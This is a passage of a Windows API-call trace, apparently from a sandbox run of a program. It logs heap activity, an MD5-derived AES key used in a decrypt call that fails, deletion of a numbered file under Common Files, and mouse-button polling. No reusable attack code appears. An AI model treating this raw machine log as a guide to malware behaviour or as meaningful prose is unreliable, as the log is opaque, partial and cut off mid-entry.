HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6108 | out: hHeap=0xbe0000) returned 1 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dcd8 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6108 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe019b8 [0250.200] PeekMessageW (in: lpMsg=0x8bf17c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf17c) returned 0 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd28 [0250.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87d8 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53000 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8868 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8640 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fa0 [0250.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8640 | out: hHeap=0xbe0000) returned 1 [0250.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fa0 | out: hHeap=0xbe0000) returned 1 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd50 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8640 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fa0 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf62b8 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87c0 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fb0 [0250.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87c0 | out: hHeap=0xbe0000) returned 1 [0250.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fb0 | out: hHeap=0xbe0000) returned 1 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dd78 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87c0 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fb0 [0250.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87c0 | out: hHeap=0xbe0000) returned 1 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dda0 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87c0 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8688 [0250.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fc0 [0250.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8688 | out: hHeap=0xbe0000) returned 1 [0250.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fc0 | out: hHeap=0xbe0000) returned 1 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3ddc8 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8688 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fc0 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6138 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86b8 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fd0 [0250.202] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf86b8 | out: hHeap=0xbe0000) returned 1 [0250.202] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fd0 | out: hHeap=0xbe0000) returned 1 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3ddf0 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86b8 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fd0 [0250.202] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf86b8 | out: hHeap=0xbe0000) returned 1 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3de18 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86b8 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6168 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52fe0 [0250.202] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6168 | out: hHeap=0xbe0000) returned 1 [0250.202] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52fe0 | out: hHeap=0xbe0000) returned 1 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3de40 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6168 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fe0 [0250.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86a0 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86e8 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52f80 [0250.203] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf86e8 | out: hHeap=0xbe0000) returned 1 [0250.203] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.203] PeekMessageW (in: lpMsg=0x8bf17c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf17c) returned 0 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f80 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3de68 [0250.203] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.203] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3de68 | out: hHeap=0xbe0000) returned 1 [0250.203] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf86e8 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01a00 [0250.203] PeekMessageW (in: lpMsg=0x8bef24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef24) returned 0 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52f80 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ff0 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c98 [0250.203] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.203] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.203] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52ff0 | out: hHeap=0xbe0000) returned 1 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf6198 [0250.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01a48 [0250.203] PeekMessageW (in: lpMsg=0x8beb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beb04) returned 0 [0250.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.204] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.204] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f80 | out: hHeap=0xbe0000) returned 1 [0250.204] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.204] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.204] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f90 | out: hHeap=0xbe0000) returned 1 [0250.204] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0250.204] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3de90 | out: hHeap=0xbe0000) returned 1 [0250.204] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f90 | out: hHeap=0xbe0000) returned 1 [0250.204] CryptCreateHash (in: hProv=0xc415b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8beb48 | out: phHash=0x8beb48) returned 1 [0250.204] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.204] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.205] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f30 | out: hHeap=0xbe0000) returned 1 [0250.205] CryptHashData (hHash=0xe74de0, pbData=0xdf85c8, dwDataLen=0xd, dwFlags=0x1) returned 1 [0250.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.205] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.205] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f30 | out: hHeap=0xbe0000) returned 1 [0250.205] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0250.205] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3de90 | out: hHeap=0xbe0000) returned 1 [0250.205] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52f30 | out: hHeap=0xbe0000) returned 1 [0250.206] CryptDeriveKey (in: hProv=0xc415b8, Algid=0x660e, hBaseData=0xe74de0, dwFlags=0x1, phKey=0x8beb48 | out: phKey=0x8beb48*=0xe74e20) returned 1 [0250.206] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.206] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.206] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52eb0 | out: hHeap=0xbe0000) returned 1 [0250.206] CryptDestroyHash (hHash=0xe74de0) returned 1 [0250.210] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0250.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72cd0 | out: hHeap=0xbe0000) returned 1 [0250.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53040 | out: hHeap=0xbe0000) returned 1 [0250.210] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0250.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01a00 | out: hHeap=0xbe0000) returned 1 [0250.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52eb0 | out: hHeap=0xbe0000) returned 1 [0250.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72cd0 | out: hHeap=0xbe0000) returned 1 [0250.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52e60 | out: hHeap=0xbe0000) returned 1 [0250.210] CryptGetKeyParam (in: hKey=0xe74e20, dwParam=0x7, pbData=0xe52f50, pdwDataLen=0x8be630, dwFlags=0x0 | out: pbData=0xe52f50*=0x660e, pdwDataLen=0x8be630*=0x4) returned 1 [0250.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52dd0 [0250.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe766e0 [0250.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40f30 [0250.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf5f58 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf5fe8 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8580 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52de0 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8580 | out: hHeap=0xbe0000) returned 1 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52de0 | out: hHeap=0xbe0000) returned 1 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf5fe8 | out: hHeap=0xbe0000) returned 1 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf5fe8 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8580 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8538 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52de0 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8538 | out: hHeap=0xbe0000) returned 1 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52de0 | out: hHeap=0xbe0000) returned 1 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8580 | out: hHeap=0xbe0000) returned 1 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8580 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8538 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8520 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52de0 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8520 | out: hHeap=0xbe0000) returned 1 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52de0 | out: hHeap=0xbe0000) returned 1 [0250.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8538 | out: hHeap=0xbe0000) returned 1 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8538 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8520 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6018 [0250.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52de0 [0250.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6018 | out: hHeap=0xbe0000) returned 1 [0250.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52de0 | out: hHeap=0xbe0000) returned 1 [0250.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8520 | out: hHeap=0xbe0000) returned 1 [0250.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8520 [0250.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6018 [0250.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8568 [0250.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52de0 [0250.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8568 | out: hHeap=0xbe0000) returned 1 [0250.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52de0 | out: hHeap=0xbe0000) returned 1 [0250.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6018 | out: hHeap=0xbe0000) returned 1 [0250.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6018 [0250.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8568 [0250.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86e8 [0250.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52de0 [0250.212] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.213] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.213] CryptDecrypt (in: hKey=0xe74e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe766e0, pdwDataLen=0x8beb60 | out: pbData=0xe766e0, pdwDataLen=0x8beb60) returned 0 [0250.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52da0 [0250.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe76db0 [0250.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1c) returned 0xe3df80 [0250.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8460 [0250.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf86e8 [0250.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8430 [0250.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52db0 [0250.214] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.217] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0250.218] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.218] CryptDestroyKey (hKey=0xe74e20) returned 1 [0250.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52ec0 [0250.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe766e0 [0250.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52e80 [0250.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8490 [0250.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6048 [0250.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8538 [0250.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fc0 [0250.218] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.218] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.218] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.219] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.219] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.219] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.219] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.219] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0250.219] CryptReleaseContext (hProv=0xc415b8, dwFlags=0x0) returned 1 [0250.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52f60 [0250.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe766e0 [0250.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8640 [0250.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8550 [0250.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf85b0 [0250.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87c0 [0250.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52fb0 [0250.219] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.220] DeleteFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 1 [0250.222] FindNextFileW (in: hFindFile=0xe74d20, lpFindFileData=0x8bf5a8 | out: lpFindFileData=0x8bf5a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x36ba8410, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x36bc31c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x8bf5e0, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0 [0250.222] FindClose (in: hFindFile=0xe74d20 | out: hFindFile=0xe74d20) returned 1 [0250.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53150 | out: hHeap=0xbe0000) returned 1 [0250.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0250.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53140 | out: hHeap=0xbe0000) returned 1 [0250.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01970 | out: hHeap=0xbe0000) returned 1 [0250.223] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53130 | out: hHeap=0xbe0000) returned 1 [0250.223] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc41530 | out: hHeap=0xbe0000) returned 1 [0250.223] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53160 | out: hHeap=0xbe0000) returned 1 [0250.223] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a30 | out: hHeap=0xbe0000) returned 1 [0250.223] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b38 | out: hHeap=0xbe0000) returned 1 [0250.223] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d760 | out: hHeap=0xbe0000) returned 1 [0250.223] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.223] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.223] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0250.224] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.224] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.224] TranslateMessage (lpMsg=0x8bf904) returned 0 [0250.224] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0250.224] GetForegroundWindow () returned 0x30150 [0250.224] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.224] GetCursorPos (in: lpPoint=0x8bf740 | out: lpPoint=0x8bf740*(x=875, y=503)) returned 1 [0250.224] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf740 | out: lpPoint=0x8bf740) returned 1 [0250.224] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xc1c570 [0250.224] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b38 [0250.224] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53160 [0250.224] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53130 [0250.224] GetAsyncKeyState (vKey=1) returned 0 [0250.224] GetAsyncKeyState (vKey=2) returned 0 [0250.224] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0250.224] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d760 [0250.224] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a30 [0250.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53140 [0250.225] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53140 | out: hHeap=0xbe0000) returned 1 [0250.225] RtlAllocateHeap 